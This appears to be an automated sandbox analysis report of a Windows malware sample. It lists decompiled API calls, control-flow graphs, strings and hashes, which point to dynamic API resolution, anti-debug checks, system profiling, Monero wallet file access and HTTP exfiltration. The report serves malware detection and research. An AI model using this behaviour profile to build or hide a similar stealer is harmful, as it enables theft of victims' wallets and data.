lstrcpy 15119->15120 15121 ea2021 15120->15121 15122 eaa9b0 4 API calls 15121->15122 15123 ea2040 15122->15123 15124 eaa8a0 lstrcpy 15123->15124 15125 ea2049 15124->15125 15126 eaa9b0 4 API calls 15125->15126 15127 ea206a 15126->15127 15128 eaa8a0 lstrcpy 15127->15128 15129 ea2073 15128->15129 15130 ea207e GetCurrentProcessId 15129->15130 15743 ea9470 OpenProcess 15130->15743 15133 eaa920 3 API calls 15134 ea20a4 15133->15134 15135 eaa8a0 lstrcpy 15134->15135 15136 ea20ad 15135->15136 15137 eaa9b0 4 API calls 15136->15137 15138 ea20d7 15137->15138 15139 eaa8a0 lstrcpy 15138->15139 15140 ea20e0 15139->15140 15141 eaa9b0 4 API calls 15140->15141 15142 ea2100 15141->15142 15143 eaa8a0 lstrcpy 15142->15143 15144 ea2109 15143->15144 15748 ea7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 eaa9b0 4 API calls 15148 ea2129 15147->15148 15149 eaa8a0 lstrcpy 15148->15149 15150 ea2132 15149->15150 15151 eaa9b0 4 API calls 15150->15151 15152 ea2151 15151->15152 15153 eaa8a0 lstrcpy 15152->15153 15154 ea215a 15153->15154 15155 eaa9b0 4 API calls 15154->15155 15156 ea217b 15155->15156 15157 eaa8a0 lstrcpy 15156->15157 15158 ea2184 15157->15158 15752 ea7f60 15158->15752 15161 eaa9b0 4 API calls 15162 ea21a4 15161->15162 15163 eaa8a0 lstrcpy 15162->15163 15164 ea21ad 15163->15164 15165 eaa9b0 4 API calls 15164->15165 15166 ea21cc 15165->15166 15167 eaa8a0 lstrcpy 15166->15167 15168 ea21d5 15167->15168 15169 eaa9b0 4 API calls 15168->15169 15170 ea21f6 15169->15170 15171 eaa8a0 lstrcpy 15170->15171 15172 ea21ff 15171->15172 15765 ea7ed0 GetSystemInfo wsprintfA 15172->15765 15175 eaa9b0 4 API calls 15176 ea221f 15175->15176 15177 eaa8a0 lstrcpy 15176->15177 15178 ea2228 15177->15178 15179 eaa9b0 4 API calls 15178->15179 15180 ea2247 15179->15180 15181 eaa8a0 lstrcpy 15180->15181 15182 ea2250 15181->15182 15183 eaa9b0 4 API calls 15182->15183 15184 ea2270 15183->15184 15185 eaa8a0 lstrcpy 15184->15185 15186 ea2279 15185->15186 15767 ea8100 GetProcessHeap 
RtlAllocateHeap 15186->15767 15189 eaa9b0 4 API calls 15190 ea2299 15189->15190 15191 eaa8a0 lstrcpy 15190->15191 15192 ea22a2 15191->15192 15193 eaa9b0 4 API calls 15192->15193 15194 ea22c1 15193->15194 15195 eaa8a0 lstrcpy 15194->15195 15196 ea22ca 15195->15196 15197 eaa9b0 4 API calls 15196->15197 15198 ea22eb 15197->15198 15199 eaa8a0 lstrcpy 15198->15199 15200 ea22f4 15199->15200 15773 ea87c0 15200->15773 15203 eaa920 3 API calls 15204 ea231e 15203->15204 15205 eaa8a0 lstrcpy 15204->15205 15206 ea2327 15205->15206 15207 eaa9b0 4 API calls 15206->15207 15208 ea2351 15207->15208 15209 eaa8a0 lstrcpy 15208->15209 15210 ea235a 15209->15210 15211 eaa9b0 4 API calls 15210->15211 15212 ea237a 15211->15212 15213 eaa8a0 lstrcpy 15212->15213 15214 ea2383 15213->15214 15215 eaa9b0 4 API calls 15214->15215 15216 ea23a2 15215->15216 15217 eaa8a0 lstrcpy 15216->15217 15218 ea23ab 15217->15218 15778 ea81f0 15218->15778 15220 ea23c2 15221 eaa920 3 API calls 15220->15221 15222 ea23d5 15221->15222 15223 eaa8a0 lstrcpy 15222->15223 15224 ea23de 15223->15224 15225 eaa9b0 4 API calls 15224->15225 15226 ea240a 15225->15226 15227 eaa8a0 lstrcpy 15226->15227 15228 ea2413 15227->15228 15229 eaa9b0 4 API calls 15228->15229 15230 ea2432 15229->15230 15231 eaa8a0 lstrcpy 15230->15231 15232 ea243b 15231->15232 15233 eaa9b0 4 API calls 15232->15233 15234 ea245c 15233->15234 15235 eaa8a0 lstrcpy 15234->15235 15236 ea2465 15235->15236 15237 eaa9b0 4 API calls 15236->15237 15238 ea2484 15237->15238 15239 eaa8a0 lstrcpy 15238->15239 15240 ea248d 15239->15240 15241 eaa9b0 4 API calls 15240->15241 15242 ea24ae 15241->15242 15243 eaa8a0 lstrcpy 15242->15243 15244 ea24b7 15243->15244 15786 ea8320 15244->15786 15246 ea24d3 15247 eaa920 3 API calls 15246->15247 15248 ea24e6 15247->15248 15249 eaa8a0 lstrcpy 15248->15249 15250 ea24ef 15249->15250 15251 eaa9b0 4 API calls 15250->15251 15252 ea2519 15251->15252 15253 eaa8a0 lstrcpy 15252->15253 15254 ea2522 15253->15254 15255 eaa9b0 4 API calls 

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          • GetProcAddress.KERNEL32(76210000,00BB1518), ref: 00EA98A1
                                          • GetProcAddress.KERNEL32(76210000,00BB1770), ref: 00EA98BA
                                          • GetProcAddress.KERNEL32(76210000,00BB1530), ref: 00EA98D2
                                          • GetProcAddress.KERNEL32(76210000,00BB1548), ref: 00EA98EA
                                          • GetProcAddress.KERNEL32(76210000,00BB1560), ref: 00EA9903
                                          • GetProcAddress.KERNEL32(76210000,00BB8BA8), ref: 00EA991B
                                          • GetProcAddress.KERNEL32(76210000,00BA5208), ref: 00EA9933
                                          • GetProcAddress.KERNEL32(76210000,00BA4FE8), ref: 00EA994C
                                          • GetProcAddress.KERNEL32(76210000,00BB1698), ref: 00EA9964
                                          • GetProcAddress.KERNEL32(76210000,00BB16E0), ref: 00EA997C
                                          • GetProcAddress.KERNEL32(76210000,00BB16B0), ref: 00EA9995
                                          • GetProcAddress.KERNEL32(76210000,00BB16C8), ref: 00EA99AD
                                          • GetProcAddress.KERNEL32(76210000,00BA5088), ref: 00EA99C5
                                          • GetProcAddress.KERNEL32(76210000,00BB16F8), ref: 00EA99DE
                                          • GetProcAddress.KERNEL32(76210000,00BB1710), ref: 00EA99F6
                                          • GetProcAddress.KERNEL32(76210000,00BA5288), ref: 00EA9A0E
                                          • GetProcAddress.KERNEL32(76210000,00BB1740), ref: 00EA9A27
                                          • GetProcAddress.KERNEL32(76210000,00BB1758), ref: 00EA9A3F
                                          • GetProcAddress.KERNEL32(76210000,00BA5268), ref: 00EA9A57
                                          • GetProcAddress.KERNEL32(76210000,00BB1890), ref: 00EA9A70
                                          • GetProcAddress.KERNEL32(76210000,00BA5008), ref: 00EA9A88
                                          • LoadLibraryA.KERNEL32(00BB18A8,?,00EA6A00), ref: 00EA9A9A
                                          • LoadLibraryA.KERNEL32(00BB17E8,?,00EA6A00), ref: 00EA9AAB
                                          • LoadLibraryA.KERNEL32(00BB1860,?,00EA6A00), ref: 00EA9ABD
                                          • LoadLibraryA.KERNEL32(00BB1800,?,00EA6A00), ref: 00EA9ACF
                                          • LoadLibraryA.KERNEL32(00BB1848,?,00EA6A00), ref: 00EA9AE0
                                          • GetProcAddress.KERNEL32(75B30000,00BB1878), ref: 00EA9B02
                                          • GetProcAddress.KERNEL32(751E0000,00BB1818), ref: 00EA9B23
                                          • GetProcAddress.KERNEL32(751E0000,00BB1830), ref: 00EA9B3B
                                          • GetProcAddress.KERNEL32(76910000,00BB8CE0), ref: 00EA9B5D
                                          • GetProcAddress.KERNEL32(75670000,00BA5028), ref: 00EA9B7E
                                          • GetProcAddress.KERNEL32(77310000,00BB8C58), ref: 00EA9B9F
                                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00EA9BB6
                                          Strings
                                          • NtQueryInformationProcess, xrefs: 00EA9BAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: NtQueryInformationProcess
                                          • API String ID: 2238633743-2781105232
                                          • Opcode ID: d73de6d7427737ce7b7c3850f28992e29b21ed3533f34851d86192d54a082cde
                                          • Instruction ID: 56d6622baca334352a30db5b0fc1441622380c21f7bd2af582409f711c893b33
                                          • Opcode Fuzzy Hash: d73de6d7427737ce7b7c3850f28992e29b21ed3533f34851d86192d54a082cde
                                          • Instruction Fuzzy Hash: 04A15BB5702241DFD364EFA8E989A6637F9F78C301705851ABE868324CD73FA941CB24

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 677 e945c0-e94695 RtlAllocateHeap 694 e946a0-e946a6 677->694 695 e946ac-e9474a 694->695 696 e9474f-e947a9 VirtualProtect 694->696 695->694
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E9460F
                                          • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E9479C
                                          Strings
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94617
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94643
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94770
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94657
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9474F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94622
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94638
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94729
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946C2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946AC
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9473F
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9471E
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9475A
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946CD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94765
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94683
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945F3
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945C7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94713
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945DD
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945D2
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9466D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94662
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E945E8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946D8
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94734
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E946B7
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9477B
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E9462D
                                          • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E94678
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeapProtectVirtual
                                          • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                          • API String ID: 1542196881-2218711628
                                          • Opcode ID: e0f13bbcf8a49429e53e79ac26b7baa9e1225278ae5f36e6f7f97551795331c5
                                          • Instruction ID: af9810ff444dc09898e720d99ec5552cddf0712fdab8b0aebd37d8dde01e4d91
                                          • Opcode Fuzzy Hash: e0f13bbcf8a49429e53e79ac26b7baa9e1225278ae5f36e6f7f97551795331c5
                                          • Instruction Fuzzy Hash: 3841C2617CB70C6BC7A5B7A49C6FFDE76966F4AF10B907750EC0062282CBE06600C616

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 801 e94880-e94942 call eaa7a0 call e947b0 call eaa740 * 5 InternetOpenA StrCmpCA 816 e9494b-e9494f 801->816 817 e94944 801->817 818 e94ecb-e94ef3 InternetCloseHandle call eaaad0 call e99ac0 816->818 819 e94955-e94acd call ea8b60 call eaa920 call eaa8a0 call eaa800 * 2 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa920 call eaa8a0 call eaa800 * 2 InternetConnectA 816->819 817->816 829 e94f32-e94fa2 call ea8990 * 2 call eaa7a0 call eaa800 * 8 818->829 830 e94ef5-e94f2d call eaa820 call eaa9b0 call eaa8a0 call eaa800 818->830 819->818 905 e94ad3-e94ad7 819->905 830->829 906 e94ad9-e94ae3 905->906 907 e94ae5 905->907 908 e94aef-e94b22 HttpOpenRequestA 906->908 907->908 909 e94b28-e94e28 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa9b0 call eaa8a0 call eaa800 call eaa920 call eaa8a0 call eaa800 call eaa740 call eaa920 * 2 call eaa8a0 call eaa800 * 2 call eaaad0 lstrlen call eaaad0 * 2 lstrlen call eaaad0 HttpSendRequestA 908->909 910 e94ebe-e94ec5 InternetCloseHandle 908->910 1021 e94e32-e94e5c InternetReadFile 909->1021 910->818 1022 e94e5e-e94e65 1021->1022 1023 e94e67-e94eb9 InternetCloseHandle call eaa800 1021->1023 1022->1023 1024 e94e69-e94ea7 call eaa9b0 call eaa8a0 call eaa800 1022->1024 1023->910 1024->1021
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E94915
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E9493A
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E94ABA
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00EB0DDB,00000000,?,?,00000000,?,",00000000,?,00BBFD20), ref: 00E94DE8
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E94E04
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E94E18
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E94E49
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94EAD
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94EC5
                                          • HttpOpenRequestA.WININET(00000000,00BBFBD0,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E94B15
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                          • InternetCloseHandle.WININET(00000000), ref: 00E94ECF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID: "$"$------$------$------
                                          • API String ID: 460715078-2180234286
                                          • Opcode ID: 14b00a2e7168f76b6e301833c8c708217a22fead810a2511bba663c2c956965f
                                          • Instruction ID: d1ea88699242d28450b27f003e40f25d003ad140aad3f4e8521773e4acc1e40b
                                          • Opcode Fuzzy Hash: 14b00a2e7168f76b6e301833c8c708217a22fead810a2511bba663c2c956965f
                                          • Instruction Fuzzy Hash: 89124E72910218AADB58EB90DC96FEEB3B8BF59300F5451A9B10676091EF343F49CF61
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7910
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7917
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00EA792F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateComputerNameProcess
                                          • String ID:
                                          • API String ID: 1664310425-0
                                          • Opcode ID: d65c674f79adec8a3eb0ad96438dc7edf27b6f80b7edac237a56a7b9364829cf
